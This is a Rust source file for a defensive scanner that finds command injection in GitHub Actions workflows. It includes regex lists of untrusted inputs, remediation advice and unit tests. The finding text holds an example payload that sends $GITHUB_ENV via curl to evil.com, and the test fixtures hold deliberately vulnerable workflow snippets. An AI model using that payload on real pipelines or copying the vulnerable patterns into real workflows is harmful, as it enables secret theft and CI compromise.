repotoire 0.9.0

//! GitHub Actions Command Injection detector
//!
//! Scans workflow files for dangerous patterns where user-controlled input
//! flows into `run:` blocks. This is a CRITICAL security vulnerability.
//!
//! CWE-78: Improper Neutralization of Special Elements used in an OS Command
//!
//! ## Blocking-tier logic (Task 11c)
//!
//! A finding is promoted to `Tier::Blocking` + `Evidence::ConfigFact { rule:
//! "gha_untrusted_input_to_run" }` **only** when:
//!
//! - The file is a `.github/workflows/` YAML (not a test-fixture path).
//! - A step's `run:` block contains a *direct* `${{ <untrusted> }}` interpolation
//!   (not via an `env:` indirection — env: lines are structurally outside run:
//!   blocks, so the scanner's state machine handles this automatically).
//! - The line is not a YAML comment.
//! - "Untrusted" is the canonical set from GitHub's security guide:
//!   `github.event.issue.{body,title}`, `github.event.pull_request.{body,title}`,
//!   `github.event.pull_request.head.{ref,label,repo.default_branch}`,
//!   `github.head_ref`, `github.event.comment.body`, `github.event.review.body`,
//!   `github.event.discussion.{body,title}`.

use crate::detectors::base::{is_test_file, Detector, DetectorConfig};
use crate::models::{Evidence, Finding, Severity, SourceSpan, Tier};
use anyhow::Result;
use regex::Regex;
use std::path::{Path, PathBuf};
use std::sync::LazyLock;
use tracing::{debug, info};

/// GitHub Actions injection detector
pub struct GHActionsInjectionDetector {
    config: DetectorConfig,
    max_findings: usize,
}

// ---------------------------------------------------------------------------
// Regex constants
// ---------------------------------------------------------------------------

/// The canonical untrusted-input set that triggers `Tier::Blocking`.
static BLOCKING_UNTRUSTED_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    let untrusted = [
        r"github\.event\.issue\.body",
        r"github\.event\.issue\.title",
        r"github\.event\.pull_request\.body",
        r"github\.event\.pull_request\.title",
        r"github\.event\.pull_request\.head\.ref",
        r"github\.event\.pull_request\.head\.label",
        r"github\.event\.pull_request\.head\.repo\.default_branch",
        r"github\.head_ref",
        r"github\.event\.comment\.body",
        r"github\.event\.review\.body",
        r"github\.event\.discussion\.body",
        r"github\.event\.discussion\.title",
    ];
    Regex::new(&format!(r"\$\{{\{{\s*({})\s*\}}\}}", untrusted.join("|")))
        .expect("valid BLOCKING_UNTRUSTED_PATTERN regex")
});

/// The broader advisory set (superset of blocking; includes commit messages,
/// sender login, inputs, etc.).
static DANGEROUS_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    let patterns = [
        r"github\.event\.pull_request\.title",
        r"github\.event\.pull_request\.body",
        r"github\.event\.pull_request\.head\.ref",
        r"github\.event\.pull_request\.head\.label",
        r"github\.event\.pull_request\.head\.repo\.default_branch",
        r"github\.head_ref",
        r"github\.event\.issue\.title",
        r"github\.event\.issue\.body",
        r"github\.event\.comment\.body",
        r"github\.event\.review\.body",
        r"github\.event\.review_comment\.body",
        r"github\.event\.discussion\.title",
        r"github\.event\.discussion\.body",
        r"github\.event\.commits\[\d*\]\.message",
        r"github\.event\.head_commit\.message",
        r"github\.event\.head_commit\.author\.name",
        r"github\.event\.head_commit\.author\.email",
        r"github\.event\.inputs\.[^}]+",
        r"github\.event\.sender\.login",
    ];
    Regex::new(&format!(r"\$\{{\{{\s*({})\s*\}}\}}", patterns.join("|"))).expect("valid regex")
});

static RUN_BLOCK_PATTERN: LazyLock<Regex> =
    LazyLock::new(|| Regex::new(r"^\s*(?:-\s+)?run:\s*[|>]?\s*").expect("valid regex"));

// ---------------------------------------------------------------------------
// Core scanning
// ---------------------------------------------------------------------------

impl GHActionsInjectionDetector {
    /// Create a new GitHub Actions injection detector
    pub fn new(_repository_path: impl Into<PathBuf>) -> Self {
        Self {
            config: DetectorConfig::default(),
            max_findings: 50,
        }
    }

    /// Set maximum findings
    #[allow(dead_code)] // Builder method
    pub fn with_max_findings(mut self, max: usize) -> Self {
        self.max_findings = max;
        self
    }

    /// Scan a workflow file for dangerous patterns
    fn scan_workflow_file(&self, file_path: &Path, content: &str) -> Vec<InjectionMatch> {
        let rel_path = file_path.to_string_lossy().to_string();
        let is_fixture = is_test_file(file_path);

        let dangerous = &*DANGEROUS_PATTERN;
        let blocking_untrusted = &*BLOCKING_UNTRUSTED_PATTERN;
        let run_block = &*RUN_BLOCK_PATTERN;

        // Extract the first capture group from a regex match (the matched expression name).
        let extract_match = |caps: regex::Captures<'_>| {
            caps.get(1)
                .map(|m| m.as_str().to_string())
                .unwrap_or_default()
        };

        let mut matches = Vec::new();
        let lines: Vec<&str> = content.lines().collect();

        let mut in_run_block = false;
        let mut run_block_indent = 0;
        let mut _run_block_start_line = 0;

        for (line_no, line) in lines.iter().enumerate() {
            let line_num = (line_no + 1) as u32;
            let stripped = line.trim_start();
            let current_indent = line.len() - stripped.len();

            // Skip comment lines — `# run: ${{ … }}` must not fire.
            if stripped.starts_with('#') {
                continue;
            }

            // Check if this line starts a run: block.
            if run_block.is_match(line) {
                in_run_block = true;
                run_block_indent = current_indent;
                _run_block_start_line = line_num;

                // Inline `run: echo "${{ … }}"` — injection on the same line.
                if let Some(caps) = dangerous.captures(line) {
                    let prev_line = if line_no > 0 {
                        Some(lines[line_no - 1])
                    } else {
                        None
                    };
                    if !crate::detectors::is_line_suppressed(line, prev_line) {
                        let pattern = extract_match(caps);
                        let is_blocking = !is_fixture && blocking_untrusted.is_match(line);
                        matches.push(InjectionMatch {
                            file: rel_path.clone(),
                            line: line_num,
                            content: line.trim().to_string(),
                            pattern,
                            is_blocking,
                        });
                    }
                }
                continue;
            }

            // Check if we're still inside the run: block.
            if in_run_block {
                if stripped.is_empty() {
                    continue;
                }

                // Dedented back to or before the run: level — block ends.
                if current_indent <= run_block_indent && !stripped.starts_with('-') {
                    in_run_block = false;
                    continue;
                }

                if let Some(caps) = dangerous.captures(line) {
                    let prev_line = if line_no > 0 {
                        Some(lines[line_no - 1])
                    } else {
                        None
                    };
                    if crate::detectors::is_line_suppressed(line, prev_line) {
                        continue;
                    }
                    let pattern = extract_match(caps);
                    let is_blocking = !is_fixture && blocking_untrusted.is_match(line);
                    matches.push(InjectionMatch {
                        file: rel_path.clone(),
                        line: line_num,
                        content: line.trim().to_string(),
                        pattern,
                        is_blocking,
                    });
                }
            }
        }

        matches
    }

    /// Create finding from injection match
    fn create_finding(&self, m: &InjectionMatch, file_path: &Path) -> Finding {
        let pattern_lower = m.pattern.to_lowercase();
        let source_type =
            if pattern_lower.contains("pull_request") || pattern_lower.contains("head_ref") {
                "Pull Request"
            } else if pattern_lower.contains("issue") {
                "Issue"
            } else if pattern_lower.contains("comment") || pattern_lower.contains("review") {
                "Comment"
            } else if pattern_lower.contains("commit") {
                "Commit"
            } else if pattern_lower.contains("inputs") {
                "Workflow Input"
            } else {
                "User Input"
            };

        let title = format!("GitHub Actions Command Injection ({})", source_type);

        let description = format!(
            r#"**Critical: Command Injection in GitHub Actions Workflow**

**File**: `{}`
**Line**: {}

**Vulnerable pattern detected**: `${{{{ {} }}}}`

**Code**:
```yaml
{}
```

This workflow interpolates user-controlled input directly into a shell command.
An attacker can exploit this to execute arbitrary commands in your CI environment.

**Attack vector**:
- For PRs: Attacker opens a PR with a malicious title/branch name
- For issues: Attacker creates an issue with a malicious title/body
- For comments: Attacker posts a comment with shell injection payload

**Example attack payload** (in PR title):
```
"; curl -X POST -d @$GITHUB_ENV http://evil.com; #
```

This can lead to:
- **Secrets exfiltration**: GITHUB_TOKEN, AWS keys, API tokens
- **Supply chain attacks**: Malicious code pushed to main branch
- **Lateral movement**: Access to other repositories via GITHUB_TOKEN
- **Complete repository compromise**"#,
            m.file, m.line, m.pattern, m.content
        );

        let recommendation = format!(
            r#"**Recommended fixes**:

1. **Use an intermediate environment variable** (preferred):
   ```yaml
   - name: Safe handling
     env:
       TITLE: ${{{{ {} }}}}
     run: |
       echo "Title: $TITLE"
   ```

2. **Use GitHub Script action** (for complex logic):
   ```yaml
   - uses: actions/github-script@v7
     with:
       script: |
         const title = context.payload.pull_request.title;
         // Process safely in JavaScript
   ```

**References**:
- https://securitylab.github.com/research/github-actions-untrusted-input/
- https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions"#,
            m.pattern
        );

        let (tier, evidence, deterministic, confidence) = if m.is_blocking {
            let span = SourceSpan {
                file: file_path.to_path_buf(),
                line_start: m.line,
                line_end: m.line,
                snippet: Some(m.content.clone()),
            };
            (
                Tier::Blocking,
                Some(Evidence::ConfigFact {
                    span,
                    rule: "gha_untrusted_input_to_run".to_string(),
                }),
                true,
                Some(1.0_f64),
            )
        } else {
            (Tier::Advisory, None, false, Some(0.85_f64))
        };

        Finding {
            id: String::new(),
            detector: "GHActionsInjectionDetector".to_string(),
            severity: Severity::Critical,
            title,
            description,
            affected_files: vec![PathBuf::from(&m.file)],
            line_start: Some(m.line),
            line_end: Some(m.line),
            suggested_fix: Some(recommendation),
            estimated_effort: Some("Low (15-30 minutes)".to_string()),
            category: Some("command_injection".to_string()),
            cwe_id: Some("CWE-78".to_string()),
            why_it_matters: Some(
                "Command injection in CI/CD pipelines can lead to complete repository compromise, \
                 secrets theft, and supply chain attacks affecting all users of your software."
                    .to_string(),
            ),
            tier,
            evidence,
            deterministic,
            confidence,
            ..Default::default()
        }
    }
}

/// Injection match result
struct InjectionMatch {
    file: String,
    line: u32,
    content: String,
    pattern: String,
    /// True when this match qualifies for `Tier::Blocking`.
    is_blocking: bool,
}

impl Detector for GHActionsInjectionDetector {
    fn name(&self) -> &'static str {
        "GHActionsInjectionDetector"
    }

    fn description(&self) -> &'static str {
        "Detects command injection vulnerabilities in GitHub Actions workflows"
    }

    fn bypass_postprocessor(&self) -> bool {
        true
    }

    fn requires_graph(&self) -> bool {
        false
    }

    fn file_extensions(&self) -> &'static [&'static str] {
        &["yml", "yaml"]
    }

    fn detect(
        &self,
        ctx: &crate::detectors::analysis_context::AnalysisContext,
    ) -> Result<Vec<Finding>> {
        let fp = ctx.as_file_provider();

        let yaml_files = fp.files_with_extensions(&["yml", "yaml"]);
        let workflow_files: Vec<&Path> = yaml_files
            .into_iter()
            .filter(|p| p.to_string_lossy().contains(".github/workflows/"))
            .collect();

        if workflow_files.is_empty() {
            debug!("No .github/workflows YAML files found");
            return Ok(Vec::new());
        }

        info!(
            "Scanning {} GitHub Actions workflow files",
            workflow_files.len()
        );

        let mut all_matches: Vec<(InjectionMatch, PathBuf)> = Vec::new();

        for path in workflow_files {
            let content = match fp.content(path) {
                Some(c) => c,
                None => continue,
            };

            for m in self.scan_workflow_file(path, &content) {
                all_matches.push((m, path.to_path_buf()));
            }

            if all_matches.len() >= self.max_findings {
                break;
            }
        }

        let findings: Vec<Finding> = all_matches
            .iter()
            .take(self.max_findings)
            .map(|(m, path)| self.create_finding(m, path))
            .collect();

        info!(
            "GHActionsInjectionDetector found {} potential vulnerabilities",
            findings.len()
        );

        Ok(findings)
    }

    fn category(&self) -> &'static str {
        "security"
    }

    fn config(&self) -> Option<&DetectorConfig> {
        Some(&self.config)
    }
}

impl crate::detectors::RegisteredDetector for GHActionsInjectionDetector {
    fn create(init: &crate::detectors::DetectorInit) -> std::sync::Arc<dyn Detector> {
        std::sync::Arc::new(Self::new(init.repo_path))
    }

    fn max_tier() -> crate::models::Tier {
        crate::models::Tier::Blocking
    }
}

// ---------------------------------------------------------------------------
// Tests
// ---------------------------------------------------------------------------

#[cfg(test)]
mod tests {
    use super::*;
    use crate::models::{Evidence, Tier};

    // -----------------------------------------------------------------------
    // Task 11c — blocking-tier tests (required by plan)
    // -----------------------------------------------------------------------

    /// Helper: scan a single workflow file content and return all findings.
    fn scan(path: &str, content: &str) -> Vec<Finding> {
        let detector = GHActionsInjectionDetector::new(Path::new("."));
        let file_path = Path::new(path);
        detector
            .scan_workflow_file(file_path, content)
            .into_iter()
            .map(|m| detector.create_finding(&m, file_path))
            .collect()
    }

    #[test]
    fn exact_antipattern_is_blocking() {
        let content = r#"
on: [issues]
jobs:
  echo:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ github.event.issue.body }}"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        assert!(!findings.is_empty(), "should have at least one finding");
        let f = findings
            .iter()
            .find(|f| f.tier == Tier::Blocking)
            .expect("at least one Blocking finding");

        assert_eq!(f.tier, Tier::Blocking);
        match &f.evidence {
            Some(Evidence::ConfigFact { rule, .. }) => {
                assert_eq!(rule, "gha_untrusted_input_to_run");
            }
            other => panic!("expected ConfigFact evidence, got {:?}", other),
        }
        assert!(f.deterministic, "blocking finding must be deterministic");
        assert_eq!(
            f.confidence.unwrap(),
            1.0,
            "blocking finding confidence must be 1.0"
        );
    }

    #[test]
    fn env_indirection_is_advisory_or_absent() {
        // The untrusted value is safely routed through env: — run: uses $BODY (shell var).
        // env: lines are outside the run: block in the YAML structure, so the scanner's
        // state machine never marks them as inside a run: block.
        let content = r#"
on: [issues]
jobs:
  echo:
    runs-on: ubuntu-latest
    steps:
      - name: safe
        env:
          BODY: "${{ github.event.issue.body }}"
        run: |
          echo "$BODY"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        for f in &findings {
            assert_ne!(
                f.tier,
                Tier::Blocking,
                "env-indirection must not produce a Blocking finding; got {:?}",
                f
            );
        }
    }

    #[test]
    fn safe_context_is_not_flagged() {
        let content = r#"
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ github.sha }}"
      - run: echo "${{ inputs.name }}"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        for f in &findings {
            assert_ne!(f.tier, Tier::Blocking, "safe context must not block");
        }
    }

    #[test]
    fn commented_out_is_not_flagged() {
        let content = r#"
on: [issues]
jobs:
  echo:
    runs-on: ubuntu-latest
    steps:
      # run: echo "${{ github.event.issue.body }}"
      - run: echo "hello"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        for f in &findings {
            assert_ne!(
                f.tier,
                Tier::Blocking,
                "commented-out line must not produce a Blocking finding"
            );
        }
    }

    #[test]
    fn in_test_fixture_is_advisory() {
        let content = r#"
on: [issues]
jobs:
  echo:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ github.event.issue.body }}"
"#;
        let findings = scan("tests/fixtures/wf.yml", content);
        for f in &findings {
            assert_ne!(
                f.tier,
                Tier::Blocking,
                "test-fixture path must not produce a Blocking finding"
            );
        }
    }

    // -----------------------------------------------------------------------
    // Legacy tests (kept from original implementation)
    // -----------------------------------------------------------------------

    #[test]
    fn test_dangerous_pattern() {
        let pattern = &*DANGEROUS_PATTERN;

        assert!(pattern.is_match("echo ${{ github.event.pull_request.title }}"));
        assert!(pattern.is_match("${{ github.head_ref }}"));
        assert!(pattern.is_match("${{ github.event.issue.body }}"));
        assert!(pattern.is_match("${{ github.event.comment.body }}"));

        assert!(!pattern.is_match("${{ github.sha }}"));
        assert!(!pattern.is_match("${{ github.repository }}"));
        assert!(!pattern.is_match("${{ secrets.GITHUB_TOKEN }}"));
    }

    #[test]
    fn test_run_block_pattern() {
        let pattern = &*RUN_BLOCK_PATTERN;

        assert!(pattern.is_match("run: echo hello"));
        assert!(pattern.is_match("  run: |"));
        assert!(pattern.is_match("    - run: >"));
        assert!(!pattern.is_match("name: Run tests"));
    }

    #[test]
    fn blocking_untrusted_pattern_matches_canonical_set() {
        let p = &*BLOCKING_UNTRUSTED_PATTERN;
        assert!(p.is_match("${{ github.event.issue.body }}"));
        assert!(p.is_match("${{ github.event.issue.title }}"));
        assert!(p.is_match("${{ github.event.pull_request.body }}"));
        assert!(p.is_match("${{ github.event.pull_request.title }}"));
        assert!(p.is_match("${{ github.event.pull_request.head.ref }}"));
        assert!(p.is_match("${{ github.event.pull_request.head.label }}"));
        assert!(p.is_match("${{ github.head_ref }}"));
        assert!(p.is_match("${{ github.event.comment.body }}"));
        assert!(p.is_match("${{ github.event.review.body }}"));
        assert!(p.is_match("${{ github.event.discussion.body }}"));
        assert!(p.is_match("${{ github.event.discussion.title }}"));
        assert!(!p.is_match("${{ github.sha }}"));
        assert!(!p.is_match("${{ github.repository }}"));
        assert!(!p.is_match("${{ secrets.GITHUB_TOKEN }}"));
        assert!(!p.is_match("${{ inputs.name }}"));
        assert!(!p.is_match("${{ github.event.sender.login }}"));
    }

    #[test]
    fn additional_untrusted_inputs_are_blocking() {
        let content = r#"
on: [pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - run: git checkout "${{ github.event.pull_request.head.ref }}"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        let blocking = findings.iter().filter(|f| f.tier == Tier::Blocking).count();
        assert!(blocking > 0, "head.ref should produce a Blocking finding");
    }

    #[test]
    fn multiline_run_block_is_blocking() {
        let content = r#"
on: [issues]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "start"
          echo "${{ github.event.issue.title }}"
          echo "end"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        let blocking: Vec<_> = findings
            .iter()
            .filter(|f| f.tier == Tier::Blocking)
            .collect();
        assert!(
            !blocking.is_empty(),
            "untrusted input in multiline run block should be Blocking"
        );
        match &blocking[0].evidence {
            Some(Evidence::ConfigFact { rule, .. }) => {
                assert_eq!(rule, "gha_untrusted_input_to_run");
            }
            other => panic!("expected ConfigFact, got {:?}", other),
        }
    }
}